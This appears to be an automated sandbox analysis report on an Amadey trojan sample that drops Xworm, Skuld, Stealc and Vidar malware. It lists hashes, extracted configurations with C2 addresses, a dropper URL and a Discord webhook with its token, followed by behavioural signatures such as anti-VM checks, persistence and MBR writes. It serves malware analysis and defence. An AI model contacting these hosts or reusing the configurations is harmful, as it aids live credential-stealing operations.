amadey | ab8b903ee062c93347eb738d00d0dbf707cdbbb8d26cf4dac7691ccbf8a8aff2

Analysis

max time kernel
108s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
22/03/2025, 12:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

random.exe
Size

2.0MB
MD5

453e433ce707a2dff379af17e1a7fe44
SHA1

c95d4c253627be7f36630f5e933212818de19ed7
SHA256

ab8b903ee062c93347eb738d00d0dbf707cdbbb8d26cf4dac7691ccbf8a8aff2
SHA512

9aa5b06bf01017aa13fd57350ba627cc892246e55e5adf8d785ff8a2252da7cbc28cf5e5e4170d877e4be01538a230646cfc581873acf183f0485c66e6397fd4
SSDEEP

49152:r3NOfcJRt0nsMQ8Yry0GO0WqMQvELO6fKM3O:TNt0nsR8Ud7p1O

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://196.251.91.42/up/uploads/encryption02.jpg

exe.dropper

http://196.251.91.42/up/uploads/encryption02.jpg

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

amadey

Version

5.33

Botnet

06bcb9

http://195.82.146.131

Attributes

install_dir
06a5c50e21
install_file
tgvazx.exe
strings_key
1861b156ffe931ec912bb17b5ff77a36
url_paths
/h8ejjcsDs/index.php

rc4.plain

Extracted

Family

xworm

Version

5.0

httpss.myvnc.com:1907

Mutex

xWIArEKzuXpfRVkJ

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

skuld

https://discordapp.com/api/webhooks/1349647136895012916/qSys_fpsL_y7usKH_AyrFupSjzSsVfg2t895g2HV8Yz72asrwCIsHaqqhPtDFjz8g8_E

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Vidar Stealer 1 IoCs

stealer

resource	yara_rule
behavioral2/memory/2016-31606-0x0000000000400000-0x0000000000870000-memory.dmp	family_vidar_v7

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/memory/9896-26065-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm
behavioral2/memory/10340-26288-0x000000000A030000-0x000000000A4C6000-memory.dmp	family_xworm

Skuld family
skuld
Skuld stealer
An info stealer written in Go lang.
stealer skuld
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	RrRYo50.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	tgvazx.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	tgvazx.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	tgvazx.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	k3t05Da.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
114	10340	powershell.exe
138	10340	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
10340	powershell.exe
5464	powershell.exe
8164	powershell.exe
10032	powershell.exe
4540	powershell.exe
9444	powershell.exe

Downloads MZ/PE file 13 IoCs

flow	pid	Process
40	2224	svchost.exe
43	1652	rapes.exe
102	1652	rapes.exe
102	1652	rapes.exe
137	1652	rapes.exe
137	1652	rapes.exe
137	1652	rapes.exe
137	1652	rapes.exe
137	1652	rapes.exe
137	1652	rapes.exe
137	1652	rapes.exe
38	1652	rapes.exe
24	1652	rapes.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\750fb06b.sys	fa36580e.exe
File created	C:\Windows\System32\Drivers\klupd_750fb06ba_arkmon.sys	fa36580e.exe
File created	C:\Windows\System32\Drivers\klupd_750fb06ba_klbg.sys	fa36580e.exe

Sets service image path in registry 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_750fb06ba_arkmon\ImagePath = "System32\\Drivers\\klupd_750fb06ba_arkmon.sys"	fa36580e.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_750fb06ba_klbg\ImagePath = "System32\\Drivers\\klupd_750fb06ba_klbg.sys"	fa36580e.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_750fb06ba_klark\ImagePath = "System32\\Drivers\\klupd_750fb06ba_klark.sys"	fa36580e.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_750fb06ba_mark\ImagePath = "System32\\Drivers\\klupd_750fb06ba_mark.sys"	fa36580e.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_750fb06ba_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_750fb06ba_arkmon.sys"	fa36580e.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\750fb06b\ImagePath = "System32\\Drivers\\750fb06b.sys"	fa36580e.exe

Uses browser remote debugging 2 TTPs 5 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
9552	chrome.exe
6356	chrome.exe
12884	chrome.exe
8120	chrome.exe
8456	chrome.exe

Checks BIOS information in registry 2 TTPs 18 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	tgvazx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RrRYo50.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	tgvazx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	tgvazx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RrRYo50.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	tgvazx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	tgvazx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	k3t05Da.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	tgvazx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	k3t05Da.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	k3t05Da.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	zx4PJh6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	random.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	RrRYo50.exe

Deletes itself 1 IoCs

pid	Process
1900	w32tm.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tetras.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tetras.bat	cmd.exe

Executes dropped EXE 23 IoCs

pid	Process
1652	rapes.exe
2084	RrRYo50.exe
388	tgvazx.exe
4312	tK0oYx3.exe
3528	d3jhg_003.exe
3688	tzutil.exe
1900	w32tm.exe
1092	rapes.exe
7820	tgvazx.exe
5288	k3t05Da.exe
5188	wjfOfXh.exe
9896	k3t05Da.exe
11892	ARxx7NW.exe
5528	4009c6a.exe
5640	fa36580e.exe
12824	0000003312.exe
2084	OkH8IPF.exe
6520	50KfF6O.exe
11988	zx4PJh6.exe
4452	rapes.exe
8784	tgvazx.exe
3180	Attributes.exe
10444	Kr9UTz2.exe

Identifies Wine through registry keys 2 TTPs 8 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	RrRYo50.exe
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	tgvazx.exe
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	tgvazx.exe
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	tgvazx.exe
Key opened	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine	random.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\750fb06b.sys	fa36580e.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\750fb06b.sys\ = "Driver"	fa36580e.exe

Loads dropped DLL 26 IoCs

pid	Process
5288	k3t05Da.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe

Obfuscated with Agile.Net obfuscator 3 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral2/files/0x0008000000024150-352.dat	agile_net
behavioral2/files/0x0008000000024150-25999.dat	agile_net
behavioral2/memory/5288-26003-0x0000000000360000-0x000000000094C000-memory.dmp	agile_net

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x000a00000001db2a-26009.dat	themida
behavioral2/memory/5288-26013-0x00000000706E0000-0x0000000070CC0000-memory.dmp	themida
behavioral2/memory/5288-26025-0x00000000706E0000-0x0000000070CC0000-memory.dmp	themida
behavioral2/memory/5288-26060-0x00000000706E0000-0x0000000070CC0000-memory.dmp	themida

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	50KfF6O.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\97414e04-75af-483d-a072-ae5f1116c56f = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{de3aeedc-188c-4d04-b475-3abf4463adba}\\97414e04-75af-483d-a072-ae5f1116c56f.cmd\""	fa36580e.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	k3t05Da.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	fa36580e.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	fa36580e.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
6892	tasklist.exe
12884	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
868	random.exe
1652	rapes.exe
2084	RrRYo50.exe
388	tgvazx.exe
1092	rapes.exe
7820	tgvazx.exe
4452	rapes.exe
8784	tgvazx.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4312 set thread context of 392	4312	tK0oYx3.exe	104
PID 5288 set thread context of 9896	5288	k3t05Da.exe	134
PID 2084 set thread context of 7536	2084	OkH8IPF.exe	149

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a00000002416e-29400.dat	upx
behavioral2/memory/6520-29408-0x0000000000F80000-0x0000000001A0E000-memory.dmp	upx
behavioral2/memory/6520-29410-0x0000000000F80000-0x0000000001A0E000-memory.dmp	upx

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	4009c6a.exe
File opened (read-only)	\??\VBoxMiniRdrDN	fa36580e.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\RuntimeApp\0000003312.exe	ARxx7NW.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\VancouverPulse	zx4PJh6.exe
File opened for modification	C:\Windows\GuaranteesFear	zx4PJh6.exe
File opened for modification	C:\Windows\CylinderPair	zx4PJh6.exe
File opened for modification	C:\Windows\OfficeForbes	zx4PJh6.exe
File created	C:\Windows\Tasks\rapes.job	random.exe
File opened for modification	C:\Windows\NecessityInfections	zx4PJh6.exe
File opened for modification	C:\Windows\SheDrum	zx4PJh6.exe
File opened for modification	C:\Windows\InvestingTr	zx4PJh6.exe
File created	C:\Windows\Tasks\tgvazx.job	RrRYo50.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	fa36580e.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	fa36580e.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
12760	12052	WerFault.exe	176

System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4009c6a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RrRYo50.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	k3t05Da.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wjfOfXh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	k3t05Da.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zx4PJh6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tgvazx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fa36580e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d3jhg_003.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
9520	schtasks.exe

Suspicious behavior: EnumeratesProcesses 51 IoCs

pid	Process
868	random.exe
868	random.exe
1652	rapes.exe
1652	rapes.exe
2084	RrRYo50.exe
2084	RrRYo50.exe
388	tgvazx.exe
388	tgvazx.exe
392	MSBuild.exe
392	MSBuild.exe
392	MSBuild.exe
392	MSBuild.exe
4540	powershell.exe
4540	powershell.exe
4540	powershell.exe
1092	rapes.exe
1092	rapes.exe
7820	tgvazx.exe
7820	tgvazx.exe
5188	wjfOfXh.exe
5188	wjfOfXh.exe
9444	powershell.exe
9444	powershell.exe
10340	powershell.exe
10340	powershell.exe
9444	powershell.exe
10340	powershell.exe
5464	powershell.exe
5464	powershell.exe
5464	powershell.exe
10032	powershell.exe
10032	powershell.exe
10032	powershell.exe
7504	powershell.exe
7504	powershell.exe
7504	powershell.exe
7536	MSBuild.exe
7536	MSBuild.exe
7536	MSBuild.exe
7536	MSBuild.exe
8164	powershell.exe
8164	powershell.exe
8164	powershell.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
4452	rapes.exe
4452	rapes.exe
8784	tgvazx.exe
8784	tgvazx.exe

Suspicious behavior: LoadsDriver 4 IoCs

pid	Process
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe
5640	fa36580e.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
3528	d3jhg_003.exe
3528	d3jhg_003.exe
3528	d3jhg_003.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeDebugPrivilege	4540	powershell.exe
Token: SeDebugPrivilege	5288	k3t05Da.exe
Token: SeDebugPrivilege	9444	powershell.exe
Token: SeDebugPrivilege	10340	powershell.exe
Token: SeDebugPrivilege	9896	k3t05Da.exe
Token: SeDebugPrivilege	5464	powershell.exe
Token: SeDebugPrivilege	5640	fa36580e.exe
Token: SeBackupPrivilege	5640	fa36580e.exe
Token: SeRestorePrivilege	5640	fa36580e.exe
Token: SeLoadDriverPrivilege	5640	fa36580e.exe
Token: SeShutdownPrivilege	5640	fa36580e.exe
Token: SeSystemEnvironmentPrivilege	5640	fa36580e.exe
Token: SeSecurityPrivilege	5640	fa36580e.exe
Token: SeDebugPrivilege	10032	powershell.exe
Token: SeDebugPrivilege	12824	0000003312.exe
Token: SeBackupPrivilege	5640	fa36580e.exe
Token: SeRestorePrivilege	5640	fa36580e.exe
Token: SeDebugPrivilege	5640	fa36580e.exe
Token: SeSystemEnvironmentPrivilege	5640	fa36580e.exe
Token: SeSecurityPrivilege	5640	fa36580e.exe
Token: SeCreatePermanentPrivilege	5640	fa36580e.exe
Token: SeShutdownPrivilege	5640	fa36580e.exe
Token: SeLoadDriverPrivilege	5640	fa36580e.exe
Token: SeIncreaseQuotaPrivilege	5640	fa36580e.exe
Token: SeSecurityPrivilege	5640	fa36580e.exe
Token: SeSystemProfilePrivilege	5640	fa36580e.exe
Token: SeDebugPrivilege	5640	fa36580e.exe
Token: SeMachineAccountPrivilege	5640	fa36580e.exe
Token: SeCreateTokenPrivilege	5640	fa36580e.exe
Token: SeAssignPrimaryTokenPrivilege	5640	fa36580e.exe
Token: SeTcbPrivilege	5640	fa36580e.exe
Token: SeAuditPrivilege	5640	fa36580e.exe
Token: SeSystemEnvironmentPrivilege	5640	fa36580e.exe
Token: SeLoadDriverPrivilege	5640	fa36580e.exe
Token: SeLoadDriverPrivilege	5640	fa36580e.exe
Token: SeIncreaseQuotaPrivilege	5640	fa36580e.exe
Token: SeSecurityPrivilege	5640	fa36580e.exe
Token: SeSystemProfilePrivilege	5640	fa36580e.exe
Token: SeDebugPrivilege	5640	fa36580e.exe
Token: SeMachineAccountPrivilege	5640	fa36580e.exe
Token: SeCreateTokenPrivilege	5640	fa36580e.exe
Token: SeAssignPrimaryTokenPrivilege	5640	fa36580e.exe
Token: SeTcbPrivilege	5640	fa36580e.exe
Token: SeAuditPrivilege	5640	fa36580e.exe
Token: SeSystemEnvironmentPrivilege	5640	fa36580e.exe
Token: SeDebugPrivilege	7504	powershell.exe
Token: SeDebugPrivilege	8164	powershell.exe
Token: SeDebugPrivilege	6520	50KfF6O.exe
Token: SeDebugPrivilege	6892	tasklist.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
868	random.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 868 wrote to memory of 1652	868	random.exe	91
PID 868 wrote to memory of 1652	868	random.exe	91
PID 868 wrote to memory of 1652	868	random.exe	91
PID 1652 wrote to memory of 2084	1652	rapes.exe	98
PID 1652 wrote to memory of 2084	1652	rapes.exe	98
PID 1652 wrote to memory of 2084	1652	rapes.exe	98
PID 2084 wrote to memory of 388	2084	RrRYo50.exe	100
PID 2084 wrote to memory of 388	2084	RrRYo50.exe	100
PID 2084 wrote to memory of 388	2084	RrRYo50.exe	100
PID 1652 wrote to memory of 4312	1652	rapes.exe	101
PID 1652 wrote to memory of 4312	1652	rapes.exe	101
PID 4312 wrote to memory of 4296	4312	tK0oYx3.exe	103
PID 4312 wrote to memory of 4296	4312	tK0oYx3.exe	103
PID 4312 wrote to memory of 4296	4312	tK0oYx3.exe	103
PID 4312 wrote to memory of 392	4312	tK0oYx3.exe	104
PID 4312 wrote to memory of 392	4312	tK0oYx3.exe	104
PID 4312 wrote to memory of 392	4312	tK0oYx3.exe	104
PID 4312 wrote to memory of 392	4312	tK0oYx3.exe	104
PID 4312 wrote to memory of 392	4312	tK0oYx3.exe	104
PID 4312 wrote to memory of 392	4312	tK0oYx3.exe	104
PID 4312 wrote to memory of 392	4312	tK0oYx3.exe	104
PID 4312 wrote to memory of 392	4312	tK0oYx3.exe	104
PID 4312 wrote to memory of 392	4312	tK0oYx3.exe	104
PID 1652 wrote to memory of 3528	1652	rapes.exe	105
PID 1652 wrote to memory of 3528	1652	rapes.exe	105
PID 1652 wrote to memory of 3528	1652	rapes.exe	105
PID 3528 wrote to memory of 3596	3528	d3jhg_003.exe	106
PID 3528 wrote to memory of 3596	3528	d3jhg_003.exe	106
PID 3528 wrote to memory of 2224	3528	d3jhg_003.exe	108
PID 3528 wrote to memory of 2224	3528	d3jhg_003.exe	108
PID 3596 wrote to memory of 4540	3596	cmd.exe	109
PID 3596 wrote to memory of 4540	3596	cmd.exe	109
PID 2224 wrote to memory of 3688	2224	svchost.exe	111
PID 2224 wrote to memory of 3688	2224	svchost.exe	111
PID 2224 wrote to memory of 1900	2224	svchost.exe	112
PID 2224 wrote to memory of 1900	2224	svchost.exe	112
PID 1652 wrote to memory of 5288	1652	rapes.exe	126
PID 1652 wrote to memory of 5288	1652	rapes.exe	126
PID 1652 wrote to memory of 5288	1652	rapes.exe	126
PID 1652 wrote to memory of 5188	1652	rapes.exe	127
PID 1652 wrote to memory of 5188	1652	rapes.exe	127
PID 1652 wrote to memory of 5188	1652	rapes.exe	127
PID 5288 wrote to memory of 9268	5288	k3t05Da.exe	128
PID 5288 wrote to memory of 9268	5288	k3t05Da.exe	128
PID 5288 wrote to memory of 9268	5288	k3t05Da.exe	128
PID 5288 wrote to memory of 9444	5288	k3t05Da.exe	130
PID 5288 wrote to memory of 9444	5288	k3t05Da.exe	130
PID 5288 wrote to memory of 9444	5288	k3t05Da.exe	130
PID 5288 wrote to memory of 9520	5288	k3t05Da.exe	132
PID 5288 wrote to memory of 9520	5288	k3t05Da.exe	132
PID 5288 wrote to memory of 9520	5288	k3t05Da.exe	132
PID 5288 wrote to memory of 9896	5288	k3t05Da.exe	134
PID 5288 wrote to memory of 9896	5288	k3t05Da.exe	134
PID 5288 wrote to memory of 9896	5288	k3t05Da.exe	134
PID 5288 wrote to memory of 9896	5288	k3t05Da.exe	134
PID 5288 wrote to memory of 9896	5288	k3t05Da.exe	134
PID 5288 wrote to memory of 9896	5288	k3t05Da.exe	134
PID 5288 wrote to memory of 9896	5288	k3t05Da.exe	134
PID 5288 wrote to memory of 9896	5288	k3t05Da.exe	134
PID 9268 wrote to memory of 10340	9268	cmd.exe	135
PID 9268 wrote to memory of 10340	9268	cmd.exe	135
PID 9268 wrote to memory of 10340	9268	cmd.exe	135
PID 1652 wrote to memory of 11892	1652	rapes.exe	136
PID 1652 wrote to memory of 11892	1652	rapes.exe	136

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

